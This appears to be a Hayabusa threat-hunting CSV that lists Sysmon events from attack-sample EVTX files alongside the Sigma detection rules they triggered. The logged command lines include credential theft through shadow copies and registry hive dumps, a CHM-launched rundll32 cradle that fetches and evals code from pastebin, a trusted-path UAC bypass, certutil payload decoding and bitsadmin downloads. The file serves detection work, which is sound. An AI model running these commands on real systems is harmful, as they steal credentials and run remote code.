vssadmin.exe create shadow /for=C: | Process: C:\Windows\System32\vssadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" | LID: 0x50951 | PID: 6584 | PGUID: 
747F3D96-DD9E-5D31-0000-00105E414B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:26.989 +00:00,MSEDGEWIN10,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation_sysmon/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.082 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-DD9F-5D31-0000-00107B454B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.169 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5772 | PGUID: 747F3D96-DD9F-5D31-0000-00101A4A4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.169 +00:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation_sysmon/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" | 
Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-DD9F-5D31-0000-00102D4D4B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,high,CredAccess,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation_sysmon/proc_creation_win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.202 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.233 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6508 | PGUID: 747F3D96-DD9F-5D31-0000-001041504B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.233 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.258 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" | LID: 0x50951 | PID: 6536 | PGUID: 
747F3D96-DD9F-5D31-0000-00108D524B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:27.258 +00:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,rules/sigma/process_creation_sysmon/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:11:50.764 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x509ff | PID: 3952 | PGUID: 747F3D96-DDB6-5D31-0000-0010273D4C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 15:12:05.755 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x509ff | PID: 2156 | PGUID: 747F3D96-DDC5-5D31-0000-0010A3414D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 07:39:14.375 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | Process: C:\Windows\hh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf99eb | PID: 1504 | PGUID: 747F3D96-AE22-5D3A-0000-001096B24E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.375 
+00:00,MSEDGEWIN10,1,high,Evas,HH.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm | LID: 0xf99eb | PID: 5548 | PGUID: 747F3D96-AE22-5D3A-0000-001004D84E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 07:39:14.935 +00:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell 
Spawn,,rules/sigma/process_creation_sysmon/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-27 22:43:41.424 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.424 +00:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.755 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an 
Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:41.757 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.033 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt 
PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.161 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.392 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.392 +00:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:42.938 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 
747F3D96-D39D-5D3C-0000-001026F55500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-27 22:43:43.016 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-29 21:11:11.156 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.364 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 747F3D96-60F5-5D3F-0000-0010A7B65500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.587 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent 
Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.587 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:17.621 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:19.098 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 
747F3D96-60F7-5D3F-0000-00106F2F5600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:11:19.098 +00:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-29 21:32:55.583 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:57.633 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.659 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.659 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious 
Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:58.711 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.234 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.234 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:32:59.582 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.193 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.254 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.254 +00:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.886 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | 
PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.886 +00:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation_sysmon/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-29 21:33:03.966 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell 